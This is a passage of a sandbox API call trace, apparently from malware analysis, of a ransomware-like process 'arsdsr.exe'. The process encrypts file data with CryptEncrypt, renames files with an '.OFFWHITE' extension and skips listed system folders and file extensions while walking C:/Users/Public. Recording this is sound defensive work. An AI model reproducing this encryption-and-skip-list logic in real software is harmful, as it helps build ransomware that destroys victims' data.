lpFileSize=0x295e560*=1157) returned 1 [0153.677] GetProcessHeap () returned 0x500000 [0153.677] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543bc8 [0153.677] GetProcessHeap () returned 0x500000 [0153.677] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543be0 [0153.677] GetProcessHeap () returned 0x500000 [0153.677] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5662b0 [0153.677] GetProcessHeap () returned 0x500000 [0153.677] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5663b8 [0153.677] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.677] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.677] SystemFunction036 (in: RandomBuffer=0x543bc8, RandomBufferLength=0x10 | out: RandomBuffer=0x543bc8) returned 1 [0153.677] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.677] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.678] SystemFunction036 (in: RandomBuffer=0x543be0, RandomBufferLength=0x10 | out: RandomBuffer=0x543be0) returned 1 [0153.678] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.678] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.678] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5662b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5662b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0153.678] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.678] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.678] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5663b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5663b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0153.678] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x485, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.678] SetLastError (dwErrCode=0x0) [0153.678] WriteFile (in: hFile=0xb0, lpBuffer=0x5662b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5662b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.681] GetLastError () returned 0x0 [0153.681] GetLastError () returned 0x0 [0153.681] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x585, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.681] WriteFile (in: hFile=0xb0, lpBuffer=0x5663b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5663b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0153.681] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x685, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.681] WriteFile (in: hFile=0xb0, lpBuffer=0x543e98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x543e98*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0153.681] GetProcessHeap () returned 0x500000 [0153.681] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x485) returned 0x525638 [0153.681] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.681] ReadFile (in: hFile=0xb0, lpBuffer=0x525638, nNumberOfBytesToRead=0x485, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x525638*, lpNumberOfBytesRead=0x295e540*=0x485, lpOverlapped=0x0) returned 1 [0153.682] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.682] WriteFile (in: hFile=0xb0, lpBuffer=0x525638*, nNumberOfBytesToWrite=0x485, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x525638*, lpNumberOfBytesWritten=0x295e54c*=0x485, lpOverlapped=0x0) returned 1 [0153.682] GetProcessHeap () returned 0x500000 [0153.682] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x525638 | out: hHeap=0x500000) returned 1 [0153.682] CloseHandle (hObject=0xb0) returned 1 [0153.682] GetProcessHeap () returned 0x500000 [0153.682] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5662b0 | out: hHeap=0x500000) returned 1 [0153.682] GetProcessHeap () returned 0x500000 [0153.682] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5663b8 | out: hHeap=0x500000) returned 1 [0153.682] GetProcessHeap () returned 0x500000 [0153.682] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543bc8 | out: hHeap=0x500000) returned 1 [0153.682] GetProcessHeap () returned 0x500000 [0153.682] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543be0 | out: hHeap=0x500000) returned 1 [0153.682] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk" | out: lpString1="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk" [0153.683] lstrcatW (in: lpString1="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk.OFFWHITE") returned="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk.OFFWHITE" [0153.683] MoveFileW (lpExistingFileName="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), lpNewFileName="C:/Users\\Public\\Desktop\\Mozilla Firefox.lnk.OFFWHITE" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.offwhite")) returned 1 [0153.684] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0153.684] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.684] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.684] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.684] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.684] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\desktop.ini") returned="C:/Users\\Public\\desktop.ini" [0153.684] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.685] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.685] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.685] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.685] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.685] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.685] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.685] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.685] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.685] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.685] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="...") returned 1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="$recycle.bin") returned 1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="rsa") returned -1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="ntuser.dat") returned -1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="programdata") returned -1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="appdata") returned 1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="program files") returned -1 [0153.685] lstrcmpiW (lpString1="Documents", lpString2="program files (x86)") returned -1 [0153.685] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.685] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="Documents" | out: lpString1="C:/Users\\Public\\Documents") returned="C:/Users\\Public\\Documents" [0153.685] lstrcatW (in: lpString1="C:/Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:/Users\\Public\\Documents\\") returned="C:/Users\\Public\\Documents\\" [0153.685] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Public\\Documents\\" | out: lpString1="C:/Users\\Public\\Documents\\") returned="C:/Users\\Public\\Documents\\" [0153.685] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Documents\\*.*") returned="C:/Users\\Public\\Documents\\*.*" [0153.685] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Documents\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.687] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.687] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0153.687] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.687] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.687] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x280026, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.687] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.687] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Documents\\" | out: lpString1="C:/Users\\Public\\Documents\\") returned="C:/Users\\Public\\Documents\\" [0153.687] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Public\\Documents\\desktop.ini") returned="C:/Users\\Public\\Documents\\desktop.ini" [0153.687] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.687] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.687] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.687] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.687] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.687] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.687] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.687] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.687] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.687] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.687] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="...") returned 1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="$recycle.bin") returned 1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="rsa") returned -1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="ntuser.dat") returned -1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="programdata") returned -1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="appdata") returned 1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="program files") returned -1 [0153.688] lstrcmpiW (lpString1="My Music", lpString2="program files (x86)") returned -1 [0153.688] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Documents\\" | out: lpString1="C:/Users\\Public\\Documents\\") returned="C:/Users\\Public\\Documents\\" [0153.688] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\", lpString2="My Music" | out: lpString1="C:/Users\\Public\\Documents\\My Music") returned="C:/Users\\Public\\Documents\\My Music" [0153.688] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\My Music", lpString2="\\" | out: lpString1="C:/Users\\Public\\Documents\\My Music\\") returned="C:/Users\\Public\\Documents\\My Music\\" [0153.688] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Public\\Documents\\My Music\\" | out: lpString1="C:/Users\\Public\\Documents\\My Music\\") returned="C:/Users\\Public\\Documents\\My Music\\" [0153.688] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Documents\\My Music\\*.*") returned="C:/Users\\Public\\Documents\\My Music\\*.*" [0153.688] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Documents\\My Music\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x75401ca2, ftCreationTime.dwLowDateTime=0x295e2ac, ftCreationTime.dwHighDateTime=0x208, ftLastAccessTime.dwLowDateTime=0x53fc40, ftLastAccessTime.dwHighDateTime=0x508d58, ftLastWriteTime.dwLowDateTime=0x68, ftLastWriteTime.dwHighDateTime=0x295e2d4, nFileSizeHigh=0x28a3ebec, nFileSizeLow=0x1d, dwReserved0=0x3c003a, dwReserved1=0x295e9f0, cFileName="￾￿\x02", cAlternateFileName="")) returned 0xffffffff [0153.688] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="...") returned 1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="$recycle.bin") returned 1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="rsa") returned -1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="ntuser.dat") returned -1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="programdata") returned -1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="appdata") returned 1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="program files") returned -1 [0153.688] lstrcmpiW (lpString1="My Pictures", lpString2="program files (x86)") returned -1 [0153.688] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Documents\\" | out: lpString1="C:/Users\\Public\\Documents\\") returned="C:/Users\\Public\\Documents\\" [0153.689] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\", lpString2="My Pictures" | out: lpString1="C:/Users\\Public\\Documents\\My Pictures") returned="C:/Users\\Public\\Documents\\My Pictures" [0153.689] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:/Users\\Public\\Documents\\My Pictures\\") returned="C:/Users\\Public\\Documents\\My Pictures\\" [0153.689] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Public\\Documents\\My Pictures\\" | out: lpString1="C:/Users\\Public\\Documents\\My Pictures\\") returned="C:/Users\\Public\\Documents\\My Pictures\\" [0153.689] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Documents\\My Pictures\\*.*") returned="C:/Users\\Public\\Documents\\My Pictures\\*.*" [0153.689] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Documents\\My Pictures\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x75401ca2, ftCreationTime.dwLowDateTime=0x295e2ac, ftCreationTime.dwHighDateTime=0x208, ftLastAccessTime.dwLowDateTime=0x53fc40, ftLastAccessTime.dwHighDateTime=0x508d58, ftLastWriteTime.dwLowDateTime=0x68, ftLastWriteTime.dwHighDateTime=0x295e2d4, nFileSizeHigh=0x28a3ebec, nFileSizeLow=0x1d, dwReserved0=0x3c003a, dwReserved1=0x295e9f0, cFileName="￾￿\x02", cAlternateFileName="")) returned 0xffffffff [0153.689] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2=".") returned 1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="..") returned 1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="...") returned 1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="windows") returned -1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="$recycle.bin") returned 1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="rsa") returned -1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="ntuser.dat") returned -1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="programdata") returned -1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="appdata") returned 1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="program files") returned -1 [0153.689] lstrcmpiW (lpString1="My Videos", lpString2="program files (x86)") returned -1 [0153.689] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Public\\Documents\\" | out: lpString1="C:/Users\\Public\\Documents\\") returned="C:/Users\\Public\\Documents\\" [0153.689] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\", lpString2="My Videos" | out: lpString1="C:/Users\\Public\\Documents\\My Videos") returned="C:/Users\\Public\\Documents\\My Videos" [0153.689] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:/Users\\Public\\Documents\\My Videos\\") returned="C:/Users\\Public\\Documents\\My Videos\\" [0153.689] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\Public\\Documents\\My Videos\\" | out: lpString1="C:/Users\\Public\\Documents\\My Videos\\") returned="C:/Users\\Public\\Documents\\My Videos\\" [0153.689] lstrcatW (in: lpString1="C:/Users\\Public\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Documents\\My Videos\\*.*") returned="C:/Users\\Public\\Documents\\My Videos\\*.*" [0153.689] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Documents\\My Videos\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x75401ca2, ftCreationTime.dwLowDateTime=0x295e2ac, ftCreationTime.dwHighDateTime=0x208, ftLastAccessTime.dwLowDateTime=0x53fc40, ftLastAccessTime.dwHighDateTime=0x508d58, ftLastWriteTime.dwLowDateTime=0x68, ftLastWriteTime.dwHighDateTime=0x295e2d4, nFileSizeHigh=0x28a3ebec, nFileSizeLow=0x1d, dwReserved0=0x3c003a, dwReserved1=0x295e9f0, cFileName="￾￿\x02", cAlternateFileName="")) returned 0xffffffff [0153.689] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0153.689] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.690] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2=".") returned 1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="..") returned 1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="...") returned 1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="windows") returned -1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="$recycle.bin") returned 1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="rsa") returned -1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="ntuser.dat") returned -1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="programdata") returned -1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="appdata") returned 1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="program files") returned -1 [0153.690] lstrcmpiW (lpString1="Downloads", lpString2="program files (x86)") returned -1 [0153.690] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Public\\" | out: lpString1="C:/Users\\Public\\") returned="C:/Users\\Public\\" [0153.690] lstrcatW (in: lpString1="C:/Users\\Public\\", lpString2="Downloads" | out: lpString1="C:/Users\\Public\\Downloads") returned="C:/Users\\Public\\Downloads" [0153.690] lstrcatW (in: lpString1="C:/Users\\Public\\Downloads", lpString2="\\" | out: lpString1="C:/Users\\Public\\Downloads\\") returned="C:/Users\\Public\\Downloads\\" [0153.690] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Public\\Downloads\\" | out: lpString1="C:/Users\\Public\\Downloads\\") returned="C:/Users\\Public\\Downloads\\" [0153.690] lstrcatW (in: lpString1="C:/Users\\Public\\Downloads\\", lpString2="*.*" | out: lpString1="C:/Users\\Public\\Downloads\\*.*") returned="C:/Users\\Public\\Downloads\\*.*" [0153.690] FindFirstFileW (in: lpFileName="C:/Users\\Public\\Downloads\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, 